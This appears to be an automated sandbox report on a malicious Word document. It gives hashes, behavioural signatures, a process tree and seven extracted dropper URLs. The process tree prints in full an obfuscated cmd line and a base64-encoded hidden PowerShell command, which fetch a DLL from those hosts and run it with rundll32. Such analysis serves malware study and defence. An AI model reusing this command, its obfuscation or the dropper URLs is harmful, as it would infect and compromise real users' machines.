Analysis

  • max time kernel
    139s
  • max time network
    135s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    21-01-2021 10:33

General

  • Target

    KPU400GPY1720.doc

  • Size

    166KB

  • MD5

    3eff3709efa827fc4f9673615c8537f7

  • SHA1

    d2515f19045e5473b0e3d3a0c48596d279c141a9

  • SHA256

    055e1fe89e4daa151fe649949779e67b4b4a4f1cdb9ada40550b6ab0960f71ce

  • SHA512

    93639555a7ca82be41de7ac46083a9f916b01757baacd163c28c5fa8a91760af382be420623941dfbb171413b0f245b15ee8196f5e07a19564fe044a1df164ee

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://trainwithconviction.com/wp-admin/y/

exe.dropper

http://trainwithconviction.webdmcsolutions.com/wp-admin/rEEEU/

exe.dropper

https://perrasmoore.ca/wp-admin/rM6HK/

exe.dropper

https://canadabrightway.com/wp-admin/n3/

exe.dropper

https://upinsmokebatonrouge.com/var/Ux1V/

exe.dropper

https://thelambertagency.com/staging/Vo/

exe.dropper

https://stormhansen.com/2556460492/if/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\KPU400GPY1720.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:640
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAHMARQB0ACAAeQBkAFQAVQBXACAAKAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADUAfQB7ADEAfQAiACAALQBmACAAJwBFAG0AJwAsACcAVABPAFIAeQAnACwAJwBUACcALAAnAC4ASQBvAC4AJwAsACcAUwB5AFMAJwAsACcAZABpAHIAZQBDACcAKQApACAAIAA7ACAAIABzAGUAdAAgACgAIgB1ACIAKwAiAGEAWAAiACsAIgBLAEgAUgAiACkAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsANgB9ACIALQBmACcAaQBOAHQAJwAsACcAbQBBAG4AJwAsACcAZwAnACwAJwBFACcALAAnAGEAJwAsACcAUwB5AFMAVABFAE0ALgBuAEUAVAAuAHMARQByAHYAaQBjAGUAcABPACcALAAnAFIAJwApACAAIAApADsAJABYAG8AcQB0ADcAawB3AD0AJABKADEAXwBWACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADEAMABXADsAJABFADEAMQBIAD0AKAAnAEEAMAAnACsAJwA1AEcAJwApADsAIAAoACAAZwBpACAAdgBBAHIAaQBhAGIATABFADoAeQBkAHQAdQB3ACAAIAApAC4AVgBhAEwAVQBFADoAOgAiAEMAYABSAGUAYABBAFQARQBgAEQAaQByAEUAQwBUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AJwArACcAWABrACcAKwAnADgAJwArACcAZgAnACsAJwAwAGIAdAB7ADAAfQBCADcAbQB3AGEAdgBiAHsAMAB9ACcAKQAgACAALQBGACAAWwBjAGgAYQBSAF0AOQAyACkAKQA7ACQAVgA1ADYAUgA9ACgAJwBXADkAJwArACcAOABRACcAKQA7ACAAKAAgACAARwBlAFQALQBpAFQAZQBtACAAIAAoACcAVgAnACsAJwBBAHIAaQAnACsAJwBBAGIAJwArACcATABFADoAVQBBAFgAawBIAHIAJwApACkALgBWAEEAbAB1AGUAOgA6ACIAcwBgAGUAYABjAGAAVQBSAGkAVABgAHkAUABSAG8AdABPAEMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABQADQANABFAD0AKAAnAFYAJwArACgAJwA0ADkAJwArACcAQgAnACkAKQA7ACQASAB0AG4AZgB2ADIAdQAgAD0AIAAoACcARwAnACsAKAAnADEAJwArACcANABDACcAKQApADsAJABMADIAOQBSAD0AKAAnAFMANwAnACsAJwA0AFQAJwApADsAJABWAHoAcgBjAHEAdAA1AD0AJABIAE8ATQBFACsAKAAoACgAJwBsACcAKwAnAEIAbQAnACkAKwAoACcAWABrADgAJwArACcAZgAnACsAJwAwAGIAJwApACsAKAAnAHQAbAAnACsAJwBCAG0AQgA3ACcAKwAnAG0AJwApACsAJwB3ACcAKwAoACcAYQAnACsAJwB2AGIAJwArACcAbABCAG0AJwApACkAIAAgAC0AcgBlAFAAbABBAGMARQAgACAAKABbAGMASABBAFIAXQAxADAAOAArAFsAYwBIAEEAUgBdADYANgArAFsAYwBIAEEAUgBdADEAMAA5ACkALABbAGMASABBAFIAXQA5ADIAKQArACQASAB0AG4AZgB2ADIAdQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQA3ADQATAA9ACgAJwBOADUAJwArACcAMwBRACcAKQA7ACQAUwA4AGUANgB1AF8ANQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFUANwBfAHgAZQBvADEAPQAoACgAJwBzAGcAIAB5AHcAIAAnACsAJwBhACcAKwAnAGgAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACgAJwB0ACcAKwAnAHIAYQBpACcAKQArACgAJwBuAHcAaQB0ACcAKwAnAGgAYwBvAG4AdgBpAGMAJwArACcAdABpACcAKwAnAG8AJwApACsAKAAnAG4ALgBjAG8AbQAnACsAJwAvAHcAcAAtACcAKQArACgAJwBhACcAKwAnAGQAbQBpAG4ALwB5ACcAKwAnAC8AJwApACsAKAAnACEAJwArACcAcwBnACAAeQAnACkAKwAnAHcAIAAnACsAKAAnAGEAaAA6ACcAKwAnAC8ALwAnACkAKwAoACcAdAByACcAKwAnAGEAJwApACsAKAAnAGkAJwArACcAbgB3AGkAJwApACsAKAAnAHQAaABjACcAKwAnAG8AJwApACsAJwBuACcAKwAnAHYAJwArACcAaQAnACsAJwBjAHQAJwArACcAaQAnACsAKAAnAG8AJwArACcAbgAuAHcAJwArACcAZQBiAGQAbQBjAHMAJwArACcAbwBsAHUAJwApACsAKAAnAHQAaQBvAG4AcwAnACsAJwAuAGMAbwBtAC8AJwArACcAdwBwACcAKwAnAC0AYQBkAG0AaQBuACcAKwAnAC8AcgBFACcAKwAnAEUARQBVAC8AIQAnACsAJwBzACcAKwAnAGcAIAAnACkAKwAnAHkAJwArACcAdwAnACsAKAAnACAAJwArACcAYQBoAHMAOgAvAC8AJwArACcAcABlAHIAcgAnACsAJwBhACcAKQArACgAJwBzAG0AbwBvAHIAZQAnACsAJwAuAGMAJwArACcAYQAvACcAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAnAGEAZAAnACsAKAAnAG0AaQBuACcAKwAnAC8AJwApACsAKAAnAHIATQAnACsAJwA2AEgASwAvACcAKwAnACEAJwArACcAcwBnACcAKQArACcAIAB5ACcAKwAoACcAdwAnACsAJwAgAGEAaABzACcAKwAnADoAJwApACsAJwAvACcAKwAnAC8AYwAnACsAKAAnAGEAbgBhACcAKwAnAGQAJwArACcAYQBiAHIAaQBnAGgAJwApACsAJwB0AHcAJwArACcAYQAnACsAKAAnAHkAJwArACcALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwB3AHAAJwApACsAKAAnAC0AJwArACcAYQBkACcAKQArACcAbQBpACcAKwAnAG4AJwArACgAJwAvACcAKwAnAG4AMwAnACkAKwAnAC8AIQAnACsAJwBzACcAKwAoACcAZwAgAHkAJwArACcAdwAgACcAKwAnAGEAJwApACsAKAAnAGgAJwArACcAcwA6ACcAKQArACcALwAvACcAKwAnAHUAcAAnACsAJwBpAG4AJwArACgAJwBzAG0AJwArACcAbwBrAGUAYgAnACsAJwBhAHQAbwAnACkAKwAnAG4AJwArACgAJwByACcAKwAnAG8AdQBnACcAKQArACcAZQAuACcAKwAnAGMAbwAnACsAKAAnAG0AJwArACcALwB2ACcAKQArACgAJwBhAHIAJwArACcALwAnACkAKwAoACcAVQB4ADEAJwArACcAVgAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAnACsAJwAgAHkAJwApACsAJwB3ACAAJwArACgAJwBhACcAKwAnAGgAcwA6AC8ALwB0ACcAKwAnAGgAJwApACsAKAAnAGUAbAAnACsAJwBhACcAKQArACgAJwBtAGIAZQByACcAKwAnAHQAJwApACsAKAAnAGEAZwBlAG4AJwArACcAYwAnACsAJwB5AC4AYwBvAG0AJwArACcALwAnACsAJwBzAHQAYQAnACkAKwAoACcAZwBpAG4AZwAnACsAJwAvACcAKQArACcAVgAnACsAKAAnAG8ALwAnACsAJwAhAHMAZwAgACcAKQArACgAJwB5AHcAIABhACcAKwAnAGgAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AcwAnACsAJwB0AG8AcgAnACkAKwAnAG0AJwArACgAJwBoAGEAJwArACcAbgBzAGUAbgAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AMgA1ADUANgAnACsAJwA0ACcAKQArACcANgAwACcAKwAoACcANAA5ACcAKwAnADIALwBpACcAKwAnAGYALwAnACkAKQAuACIAUgBgAEUAUABMAEEAQwBlACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAFMAOABlADYAdQBfADUALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBQAGAATABpAHQAIgAoACQAVgA4ADAARAAgACsAIAAkAFgAbwBxAHQANwBrAHcAIAArACAAJABSADIANQBRACkAOwAkAFQAMgA1AFUAPQAoACcAUwAnACsAKAAnADEAXwAnACsAJwBIACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABBADgAdAB5ADIAYgBmACAAaQBuACAAJABVADcAXwB4AGUAbwAxACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABzAFkAUwBUAEUAbQAuAE4AZQBUAC4AdwBFAGIAYwBMAEkARQBuAFQAKQAuACIARABvAHcAbgBMAGAATwBBAGQAYABGAGkATABlACIAKAAkAEEAOAB0AHkAMgBiAGYALAAgACQAVgB6AHIAYwBxAHQANQApADsAJABBAF8ANwBUAD0AKAAnAEcAJwArACgAJwAxADQAJwArACcAQQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABWAHoAcgBjAHEAdAA1ACkALgAiAGwAYABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADIAMgAxADMAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQAVgB6AHIAYwBxAHQANQAsACgAKAAnAEEAbgAnACsAJwB5ACcAKQArACgAJwBTACcAKwAnAHQAcgBpACcAKwAnAG4AZwAnACkAKQAuACIAdABvAFMAdABSAGAASQBuAGcAIgAoACkAOwAkAFcAOAAwAEIAPQAoACcASAAnACsAKAAnADcAJwArACcAMwBSACcAKQApADsAYgByAGUAYQBrADsAJABGADgAOQBSAD0AKAAnAEQANgAnACsAJwA2AEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABKAF8AMQBHAD0AKAAoACcAQwAnACsAJwAyADAAJwApACsAJwBFACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:3920
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:3584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAgAHMARQB0ACAAeQBkAFQAVQBXACAAKAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADUAfQB7ADEAfQAiACAALQBmACAAJwBFAG0AJwAsACcAVABPAFIAeQAnACwAJwBUACcALAAnAC4ASQBvAC4AJwAsACcAUwB5AFMAJwAsACcAZABpAHIAZQBDACcAKQApACAAIAA7ACAAIABzAGUAdAAgACgAIgB1ACIAKwAiAGEAWAAiACsAIgBLAEgAUgAiACkAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsANQB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMgB9AHsAMwB9AHsANgB9ACIALQBmACcAaQBOAHQAJwAsACcAbQBBAG4AJwAsACcAZwAnACwAJwBFACcALAAnAGEAJwAsACcAUwB5AFMAVABFAE0ALgBuAEUAVAAuAHMARQByAHYAaQBjAGUAcABPACcALAAnAFIAJwApACAAIAApADsAJABYAG8AcQB0ADcAawB3AD0AJABKADEAXwBWACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADEAMABXADsAJABFADEAMQBIAD0AKAAnAEEAMAAnACsAJwA1AEcAJwApADsAIAAoACAAZwBpACAAdgBBAHIAaQBhAGIATABFADoAeQBkAHQAdQB3ACAAIAApAC4AVgBhAEwAVQBFADoAOgAiAEMAYABSAGUAYABBAFQARQBgAEQAaQByAEUAQwBUAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AJwArACcAWABrACcAKwAnADgAJwArACcAZgAnACsAJwAwAGIAdAB7ADAAfQBCADcAbQB3AGEAdgBiAHsAMAB9ACcAKQAgACAALQBGACAAWwBjAGgAYQBSAF0AOQAyACkAKQA7ACQAVgA1ADYAUgA9ACgAJwBXADkAJwArACcAOABRACcAKQA7ACAAKAAgACAARwBlAFQALQBpAFQAZQBtACAAIAAoACcAVgAnACsAJwBBAHIAaQAnACsAJwBBAGIAJwArACcATABFADoAVQBBAFgAawBIAHIAJwApACkALgBWAEEAbAB1AGUAOgA6ACIAcwBgAGUAYABjAGAAVQBSAGkAVABgAHkAUABSAG8AdABPAEMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABQADQANABFAD0AKAAnAFYAJwArACgAJwA0ADkAJwArACcAQgAnACkAKQA7ACQASAB0AG4AZgB2ADIAdQAgAD0AIAAoACcARwAnACsAKAAnADEAJwArACcANABDACcAKQApADsAJABMADIAOQBSAD0AKAAnAFMANwAnACsAJwA0AFQAJwApADsAJABWAHoAcgBjAHEAdAA1AD0AJABIAE8ATQBFACsAKAAoACgAJwBsACcAKwAnAEIAbQAnACkAKwAoACcAWABrADgAJwArACcAZgAnACsAJwAwAGIAJwApACsAKAAnAHQAbAAnACsAJwBCAG0AQgA3ACcAKwAnAG0AJwApACsAJwB3ACcAKwAoACcAYQAnACsAJwB2AGIAJwArACcAbABCAG0AJwApACkAIAAgAC0AcgBlAFAAbABBAGMARQAgACAAKABbAGMASABBAFIAXQAxADAAOAArAFsAYwBIAEEAUgBdADYANgArAFsAYwBIAEEAUgBdADEAMAA5ACkALABbAGMASABBAFIAXQA5ADIAKQArACQASAB0AG4AZgB2ADIAdQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQA3ADQATAA9ACgAJwBOADUAJwArACcAMwBRACcAKQA7ACQAUwA4AGUANgB1AF8ANQA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFUANwBfAHgAZQBvADEAPQAoACgAJwBzAGcAIAB5AHcAIAAnACsAJwBhACcAKwAnAGgAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACgAJwB0ACcAKwAnAHIAYQBpACcAKQArACgAJwBuAHcAaQB0ACcAKwAnAGgAYwBvAG4AdgBpAGMAJwArACcAdABpACcAKwAnAG8AJwApACsAKAAnAG4ALgBjAG8AbQAnACsAJwAvAHcAcAAtACcAKQArACgAJwBhACcAKwAnAGQAbQBpAG4ALwB5ACcAKwAnAC8AJwApACsAKAAnACEAJwArACcAcwBnACAAeQAnACkAKwAnAHcAIAAnACsAKAAnAGEAaAA6ACcAKwAnAC8ALwAnACkAKwAoACcAdAByACcAKwAnAGEAJwApACsAKAAnAGkAJwArACcAbgB3AGkAJwApACsAKAAnAHQAaABjACcAKwAnAG8AJwApACsAJwBuACcAKwAnAHYAJwArACcAaQAnACsAJwBjAHQAJwArACcAaQAnACsAKAAnAG8AJwArACcAbgAuAHcAJwArACcAZQBiAGQAbQBjAHMAJwArACcAbwBsAHUAJwApACsAKAAnAHQAaQBvAG4AcwAnACsAJwAuAGMAbwBtAC8AJwArACcAdwBwACcAKwAnAC0AYQBkAG0AaQBuACcAKwAnAC8AcgBFACcAKwAnAEUARQBVAC8AIQAnACsAJwBzACcAKwAnAGcAIAAnACkAKwAnAHkAJwArACcAdwAnACsAKAAnACAAJwArACcAYQBoAHMAOgAvAC8AJwArACcAcABlAHIAcgAnACsAJwBhACcAKQArACgAJwBzAG0AbwBvAHIAZQAnACsAJwAuAGMAJwArACcAYQAvACcAKQArACgAJwB3AHAAJwArACcALQAnACkAKwAnAGEAZAAnACsAKAAnAG0AaQBuACcAKwAnAC8AJwApACsAKAAnAHIATQAnACsAJwA2AEgASwAvACcAKwAnACEAJwArACcAcwBnACcAKQArACcAIAB5ACcAKwAoACcAdwAnACsAJwAgAGEAaABzACcAKwAnADoAJwApACsAJwAvACcAKwAnAC8AYwAnACsAKAAnAGEAbgBhACcAKwAnAGQAJwArACcAYQBiAHIAaQBnAGgAJwApACsAJwB0AHcAJwArACcAYQAnACsAKAAnAHkAJwArACcALgBjACcAKQArACgAJwBvACcAKwAnAG0ALwB3AHAAJwApACsAKAAnAC0AJwArACcAYQBkACcAKQArACcAbQBpACcAKwAnAG4AJwArACgAJwAvACcAKwAnAG4AMwAnACkAKwAnAC8AIQAnACsAJwBzACcAKwAoACcAZwAgAHkAJwArACcAdwAgACcAKwAnAGEAJwApACsAKAAnAGgAJwArACcAcwA6ACcAKQArACcALwAvACcAKwAnAHUAcAAnACsAJwBpAG4AJwArACgAJwBzAG0AJwArACcAbwBrAGUAYgAnACsAJwBhAHQAbwAnACkAKwAnAG4AJwArACgAJwByACcAKwAnAG8AdQBnACcAKQArACcAZQAuACcAKwAnAGMAbwAnACsAKAAnAG0AJwArACcALwB2ACcAKQArACgAJwBhAHIAJwArACcALwAnACkAKwAoACcAVQB4ADEAJwArACcAVgAnACsAJwAvACEAJwApACsAJwBzACcAKwAoACcAZwAnACsAJwAgAHkAJwApACsAJwB3ACAAJwArACgAJwBhACcAKwAnAGgAcwA6AC8ALwB0ACcAKwAnAGgAJwApACsAKAAnAGUAbAAnACsAJwBhACcAKQArACgAJwBtAGIAZQByACcAKwAnAHQAJwApACsAKAAnAGEAZwBlAG4AJwArACcAYwAnACsAJwB5AC4AYwBvAG0AJwArACcALwAnACsAJwBzAHQAYQAnACkAKwAoACcAZwBpAG4AZwAnACsAJwAvACcAKQArACcAVgAnACsAKAAnAG8ALwAnACsAJwAhAHMAZwAgACcAKQArACgAJwB5AHcAIABhACcAKwAnAGgAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AcwAnACsAJwB0AG8AcgAnACkAKwAnAG0AJwArACgAJwBoAGEAJwArACcAbgBzAGUAbgAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AMgA1ADUANgAnACsAJwA0ACcAKQArACcANgAwACcAKwAoACcANAA5ACcAKwAnADIALwBpACcAKwAnAGYALwAnACkAKQAuACIAUgBgAEUAUABMAEEAQwBlACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAFMAOABlADYAdQBfADUALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBQAGAATABpAHQAIgAoACQAVgA4ADAARAAgACsAIAAkAFgAbwBxAHQANwBrAHcAIAArACAAJABSADIANQBRACkAOwAkAFQAMgA1AFUAPQAoACcAUwAnACsAKAAnADEAXwAnACsAJwBIACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABBADgAdAB5ADIAYgBmACAAaQBuACAAJABVADcAXwB4AGUAbwAxACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQBPAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABzAFkAUwBUAEUAbQAuAE4AZQBUAC4AdwBFAGIAYwBMAEkARQBuAFQAKQAuACIARABvAHcAbgBMAGAATwBBAGQAYABGAGkATABlACIAKAAkAEEAOAB0AHkAMgBiAGYALAAgACQAVgB6AHIAYwBxAHQANQApADsAJABBAF8ANwBUAD0AKAAnAEcAJwArACgAJwAxADQAJwArACcAQQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABWAHoAcgBjAHEAdAA1ACkALgAiAGwAYABlAGAATgBnAHQAaAAiACAALQBnAGUAIAAzADIAMgAxADMAKQAgAHsAJgAoACcAcgB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQAVgB6AHIAYwBxAHQANQAsACgAKAAnAEEAbgAnACsAJwB5ACcAKQArACgAJwBTACcAKwAnAHQAcgBpACcAKwAnAG4AZwAnACkAKQAuACIAdABvAFMAdABSAGAASQBuAGcAIgAoACkAOwAkAFcAOAAwAEIAPQAoACcASAAnACsAKAAnADcAJwArACcAMwBSACcAKQApADsAYgByAGUAYQBrADsAJABGADgAOQBSAD0AKAAnAEQANgAnACsAJwA2AEkAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABKAF8AMQBHAD0AKAAoACcAQwAnACsAJwAyADAAJwApACsAJwBFACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1944
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Xk8f0bt\B7mwavb\G14C.dll,AnyString
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:192
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Xk8f0bt\B7mwavb\G14C.dll,AnyString
            4⤵
            • Loads dropped DLL
            PID:3984

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Xk8f0bt\B7mwavb\G14C.dll
      MD5

      db6b1b751143235793c97e2060753b03

      SHA1

      72c2dd8d677a9bbc86e624383d42fd0496144a5c

      SHA256

      01e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98

      SHA512

      b637c6554f875cdbfe67673969b39f672ce4f5b4cf3da0a79e2bf151d878d4fb5edec4759018a8e7f1e2362ee11cf4e35760ba4cf13ba738474818e8cc94c96c

    • \Users\Admin\Xk8f0bt\B7mwavb\G14C.dll
      MD5

      db6b1b751143235793c97e2060753b03

      SHA1

      72c2dd8d677a9bbc86e624383d42fd0496144a5c

      SHA256

      01e14d7d7d88ef53d4f9443170bff682dc9c72f13451c18c9032a5e440975e98

      SHA512

      b637c6554f875cdbfe67673969b39f672ce4f5b4cf3da0a79e2bf151d878d4fb5edec4759018a8e7f1e2362ee11cf4e35760ba4cf13ba738474818e8cc94c96c

    • memory/192-15-0x0000000000000000-mapping.dmp
    • memory/640-2-0x00007FF8FADF0000-0x00007FF8FAE00000-memory.dmp
      Filesize

      64KB

    • memory/640-3-0x00007FF8FADF0000-0x00007FF8FAE00000-memory.dmp
      Filesize

      64KB

    • memory/640-4-0x00007FF8FADF0000-0x00007FF8FAE00000-memory.dmp
      Filesize

      64KB

    • memory/640-6-0x00007FF8FADF0000-0x00007FF8FAE00000-memory.dmp
      Filesize

      64KB

    • memory/640-5-0x000002D11DC30000-0x000002D11E267000-memory.dmp
      Filesize

      6.2MB

    • memory/1944-10-0x0000028023390000-0x0000028023391000-memory.dmp
      Filesize

      4KB

    • memory/1944-11-0x0000028023380000-0x0000028023382000-memory.dmp
      Filesize

      8KB

    • memory/1944-12-0x0000028023383000-0x0000028023385000-memory.dmp
      Filesize

      8KB

    • memory/1944-13-0x000002803B830000-0x000002803B831000-memory.dmp
      Filesize

      4KB

    • memory/1944-14-0x0000028023386000-0x0000028023388000-memory.dmp
      Filesize

      8KB

    • memory/1944-9-0x00007FF917790000-0x00007FF91817C000-memory.dmp
      Filesize

      9.9MB

    • memory/1944-8-0x0000000000000000-mapping.dmp
    • memory/3584-7-0x0000000000000000-mapping.dmp
    • memory/3984-17-0x0000000000000000-mapping.dmp